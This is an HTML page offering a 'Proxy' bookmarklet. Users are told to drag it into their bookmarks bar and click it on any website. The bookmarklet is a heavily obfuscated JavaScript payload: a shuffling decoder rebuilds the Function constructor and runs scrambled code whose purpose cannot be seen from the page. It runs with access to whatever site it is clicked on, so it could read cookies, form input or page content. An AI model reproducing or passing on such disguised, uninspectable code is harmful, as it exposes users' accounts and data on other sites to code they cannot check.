<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Proxy Bookmarklet</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }
        .container {
            background-color: #fff;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            text-align: center;
            max-width: 80%;
        }
        h1 {
            font-size: 28px;
            margin-bottom: 20px;
        }
        .instructions {
            font-size: 18px;
            margin-bottom: 20px;
        }
        .bookmarklet-button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #007bff;
            color: #fff;
            border: none;
            cursor: pointer;
            text-decoration: none;
            border-radius: 4px;
            transition: background-color 0.3s ease;
        }
        .bookmarklet-button:hover {
            background-color: #0056b3;
        }
        .bookmark-bar-instructions {
            font-size: 18px;
            margin-top: 20px;
        }
        /* Media Queries for Responsiveness */
        @media (max-width: 768px) {
            h1 {
                font-size: 24px;
            }
            .instructions {
                font-size: 16px;
            }
            .bookmarklet-button {
                padding: 8px 16px;
                font-size: 14px;
            }
            .bookmark-bar-instructions {
                font-size: 16px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>How to use the Proxy</h1>
        <p class="instructions">
            To use the proxy, follow these steps:
        </p>
        <div>
            Drag the button below into to your browser's bookmarks bar:
        </div>
        <br>
        <a href="javascript:(function()%7B(function()%7Bvar LUw%3D''%2CwGY%3D929-918%3Bfunction VTf(v)%7Bvar g%3D6454647%3Bvar i%3Dv.length%3Bvar f%3D%5B%5D%3Bfor(var k%3D0%3Bk<i%3Bk%2B%2B)%7Bf%5Bk%5D%3Dv.charAt(k)%7D%3Bfor(var k%3D0%3Bk<i%3Bk%2B%2B)%7Bvar h%3Dg*(k%2B132)%2B(g%2530185)%3Bvar c%3Dg*(k%2B459)%2B(g%2544938)%3Bvar x%3Dh%25i%3Bvar o%3Dc%25i%3Bvar e%3Df%5Bx%5D%3Bf%5Bx%5D%3Df%5Bo%5D%3Bf%5Bo%5D%3De%3Bg%3D(h%2Bc)%256895203%3B%7D%3Breturn f.join('')%7D%3Bvar QZK%3DVTf('vuzornkcfoparbectwqsjihgctornlsdutxym').substr(0%2CwGY)%3Bvar Jer%3D'ou%3BS8pb av4%3Bcmu%7D(10%3B(ogh%2C(1(e%3B%2Bqg(a2Se%2Bfms17%5B.i%2Bhxr%7D"pualf9 hi%3Dn)h%3D8ad f(admrv%2Cr(r"r%5B47r%3Drv7%5B%2Cr)%2C%7D1%3D%7B%2C%2C8iet%2BvlAr.eagi%2Ca4%2B%3Bvahl6f%5B%5Dhr%3Dr(tyr%3D%2B%2Bmi%3Dtj l<f e%3B%3Bmo6z6%2B5%5B4%5D%3Dn%2Bs)n .rt%3Ds)f%7D%2C%3B%3Dij nfa)8040(%3D"%2Cu1g%2B%3B%5D*lto0az(aunCbun %2B(iu%3B(%3B)hqm)h.z%3Brhaha%3D%3B%3Bn<g zvue.vgh%3D%3B6-%2B")%3Bh)fCvv lif%2B%3B%3B"ng(w(1)a>l%5Blo(-gp%3D%3D.at77ut0"ucviyo9%7BvA7vo.tn%2Cj.prAc%7D%3B(%3Dv0%3Dse6 q%5D%3B%2C%5Dr%3Bg%3D%5Ds9o6 %2C.fclmnf%7B%5Bnm0%3Bg<%3BdgCh%3D%5Dv%2Crirri)shae2g%3B)A%3Ddns(v rxltejr%2Bn3ful%2B8v7%2C eoczc(o.%7Bttrgo ontC%3Brg%3Ddy1x)r)galp( %3B%3B%3D %2Bq%3D.j%3Bl%3B%7B%3Bnftenboe%3B%2B*h-(oc.amaeC(d)%5Dt-..%2C2.%2Br.cyntf2ce)%3D)%2Ci%2Bl%7Bc%3Dxstv%3B2mgh%7Del59 %3Bina"vu(%3B%2Ci)b%2C%3Do2u1n0%3D0p%5De%2B%5D(yrr)ttaus yrfs<arar 8n%5B%2C1xl)ex%3Bp%2Cs.(%5Bit( %5D0ifrec)%3Bt%3B%5B 2!%3Dewvl7t %2C%3Bjsgun.%3BgAb>%3Drs!)ptr9n%3D%3BCmil(h8m%2Br4cl-%3Drnv)y%7D%3Bse%2Bks%5Dbaav88-rvor7a(i1jonvpm06lhnm63%3Dtri%2B1a)90f528Cr%2C%2Bt2lnrnu)trj o%7B%3Bab)%3Daharug)amoetuaa5wre%5D-ib%3Drr%2Ct)1(%3Dog%3D%3Bsiy..ea(.%3D%3Dey%2B%2C%5B)t(p.a%3D9uh%5Bi.gtvb%3Dg%3D%5B)j.l5fbr%5D)e<nv."l%2Coa%3Ba%3D(o%5BvC( )%2Cg(%3Bpg(t%2Cevuerpw1boor"2").j.o%3Bdg)%3B'%3Bvar Pvb%3DVTf%5BQZK%5D%3Bvar XTb%3D''%3Bvar Niv%3DPvb%3Bvar HOS%3DPvb(XTb%2CVTf(Jer))%3Bvar dMe%3DHOS(VTf('1C6L%26eGGR_3%2C!Rtdn!7%7B0aG%5D.%3D.%25%23(5%3BR8!%7Dunle%5De%5D)(s%24LMR%5B%3DNRdLve0R%2C15xR"aRd%5DRaRkp! *%25y6_d%5DRn)5uce.5(a60g%3BRSnR092!%5B9()R%3DR!%5D2n5%3BMa%26 K_RRL(2nMR%5C%2FJ3%7B3RvdRs%2C3R)7RRRz99a%2CiG%3Bz..))%3B)R4%7DyA%3B)R7ubin1!%25ifR%5D%3DbrF2c8)%2Ct0)%25 eRh4fq"")5R..bk%3Ds%24Rn91re*-6otrRRoe%7B5e(%2Ceb((u3!2ut(ubx%5BRfe)Rie)!f1.72wR"RS ex%25w%25%3D%3DR y)%25F_B..d7)8R%7Dhg%7D6t%7DRRGo0%25!d101esl%3Bl4 cR!2s(R!re%7B%5D 3C%25 43n%24diit5!.R3%5Bd. n(%25l(t1(%5B%5BL!7%3FRbi%25td%2B00to!el14Ec.o. d%25RE%2C!%25I%5DRcr.R.(R%5C%2FRR%2Bwn7x1id81%3BHf.)le !RnRGnrR5RcR6o5R%40p0p%5D%3D_%3B0bod0%3BRn.9mf0%5Di%3Bi9)<%24 (elyp2%24Rd!.6R)3gohRRRy%5C%2FfweLt7)R%3DRi1t0hoC.)%24rR)Afie1%3Ba__%7D%2CD3j!.p9%2CEReR_).3R%5BnR%3Dr0drb)). 6RR%257%7Dhe%2C5RR.as4RR6)R0R( %7Bet(%3Bdt9eR1%7BR.R%3Du%3BR(b.210%7B%3D2R2Nh__%3An.(443(m1 dd1%5C%2F4.%230%7DRtr)o%7B%5C%2FR7%3D04(R5R56IlR)e%24R.34._f(5d%7BR%7BR)d7 l%5Bd1*  R%7BJ%2C1(Ehl%3Bo%247ewRk!7%24vR80n%2CR%3B56dRtdlt_e%2C.07%5BpIbjo64K!0b%3B1%3DR%2C%2C2_5oR.5ftR2thEe)e%251R(!35%2C3.>R6_R6(5bn%7DsRR%25<R%3Bng0Rrpt%3D3c3h%3B6bod7)dR )tR%40%5C's%2C6R>nR0%7B%25Rn 2%7Be(n8v7%3D%3BR%25H><)nraRR%25R%3D_eoIiRt%3D9(lj.n%5Dj6RR%3BoRh%7B!%3B1_)R4RR.5-R(%7DRR69%25!%40(ijp8_d%5D%2Bkog1d5R%3B_3%24R%24no(%3D7Fo_.%3Bn5%3D8-RR%24(nHei0%5D1))_%24es6t%3Bf%24%3Bb21hie%3B5._%2B0(6gs%2C%5C%2FeRr%3Be%3Arm3%5BRRf)9%2C0.6%5D3i%3B7R7b7C76 0f(0s)h1tR ..5op!)6(1i%3B6!%3F4e8R%3Bfxet_R %23RR%24_%3DR%3Dn)%25rRl6))<0RR!nR!IR!aCa!i61fR.m7RRR.x%254d!fG%3B6x9iuRt)R%25R(R%258l%3Bcp"2sR"(R!1v)R5.bre!%2C%7B"4R))f(4R.%255n6%3BfgiRn2n%2C-Rd6xi3%7D6S%3B)6(.oKf(rR%7BR%7Bs!b%7Bp%3B!55)"x8RRR7tdR(RR%5C%2F7Rn6(_7f0fe7m%2C%7D._R)R3nn%7DR%7D(.5R9r2%3Dbo(3_Rai%3BRr%23ej%24RmlbR%25%5B%23%5DR1.i%5DR1!DRRba%25)2Rm%24GR))%2Ca.Axy7R(ddRKB6N.eh9e%2C3_6ytR1Rx6Ff(%249d)%3DcR5l970D)%23%24%3DridR%7B1%3B_R0.8y_GR7s%24Re7<-3_%25!n%24y8R6k%5C%2FDsR9c%25t%2BR(KR703%23HB)tr %2BSRR n0retn3R%2C 2(!b_RR.%5C'fe.4154%3Blvu)R%7D%3Ddn(*(%7Dj55.%3Dx2h!5!eR3eR563t3R35_%25(%3B"lRd4%240%26af%3F!RR%2Blbiob_0de.A1_%3D%3Buio7R10%25%3BiR )RRoeR7912n96t%2Cs%3DRro%2CedRp(C43R%5C'%5D.%3B(oRD%5B99.d. 0E!RJ0a%23d4 ftp!fKr 1RRDR%24t21(eR1Rlh1pR3ARw%5Dy%24)%3B0 r(aaRoRfd%40R-RR!%3Dy.u%5C'leRR_9! 6R%3D6R<_p!%2Cp%3Di.<R %3BR%3A.dR3%25R%25%7B!R!pxM%7Be%2C1Rr99%3Bh9s%7D74F1%5D%2B_.3n%5C%2FR)R%2C 3(6.1!39!)e"HRis%7DA_Ri%3F)(nitRx4eldfR6rp%2C67R(RnRR25.exs!j%5DR%24!R%5B)Rso uxR.Agd7%3Du%3A%250R(6j87)(2)R-R%3D06!r91R33_RRoRpaRs0K-sh jte2R_!ot!fR"BR%23%5Dt%3Afe%2Ctr%3Dtv%24%251.Rb%3Beu%3B.%24ofs2n%7D%7D8_RRm7 Re_!af"))R%5D%24t%26%241 %256%3B4ti)RRr%7B%5Biao!nR)%5C'3_Rna>7fr0dR(!_s(%3F3t_5R44(d48%5D). C%7BRB RRtbdoR0o%5DnIJ_L!.!7%3D.27RdoyRR.n (7_!_texc)u%3A 6.).!uRoy!AR"RsN4s)_6n51RR0%5D.%2Cl%26RfCe_%3Da%2CHil0..RR)se%5D%5D1Rd1)qRA)RR%2CogrRo(%40%2B (%24%3B(3Ron95d%3DRrRt)(b5%2C_%7D(p! %7BdbRee(Re.%7B_0tfo.f%3D5rqhR%23R3i!6Rse(4RR(ic.!tc14dte%3B))!%7Bt%2C%25Rd%23dRns)n%25(a!!3RafyrRpao%2C)cn.lR. eK8K.K fxd)ws.2hw)KftR)R%7Budt(xR4%3D(v0_4el8%25R!%3D.hR1"R46i.h2nt-.l)%3Diu2(R)u_B_0Rl>RriL_4%2C6Ri%2C_%7D.1doRpdn'))%3Bvar BNY%3DNiv(LUw%2CdMe )%3BBNY(7758)%3Breturn 8157%7D)()%7D)()%3B" class="bookmarklet-button">Proxy</a>        <div>
        <br>
            Now, when you visit a webpage you want to use the proxy on, simply click the bookmark button that says "Proxy" in your bookmarks bar.
            <br>
            <h1>MAKE SURE YOU ONLY CLICK THE BOOKMARK ON WEBSITES OTHER THAN THIS... IT WORKS ON ANY WEBSITE!!!</h1>
            Keep in mind that you can change the name of the bookmark at any time by right-clicking the bookmark, clicking "Edit", and updating the name in the box, then clicking "Save."
        </div>
        <div class="bookmark-bar-instructions">
            <h2>What to do if you don't see the Bookmark bar</h2>
            <div>
                If you don't see the bookmark bar at the top of your screen, then you can activate it by just pressing Ctrl, Shift, and the letter B all at the same time!
            </div>
        </div>
    </div>
</body>
</html>
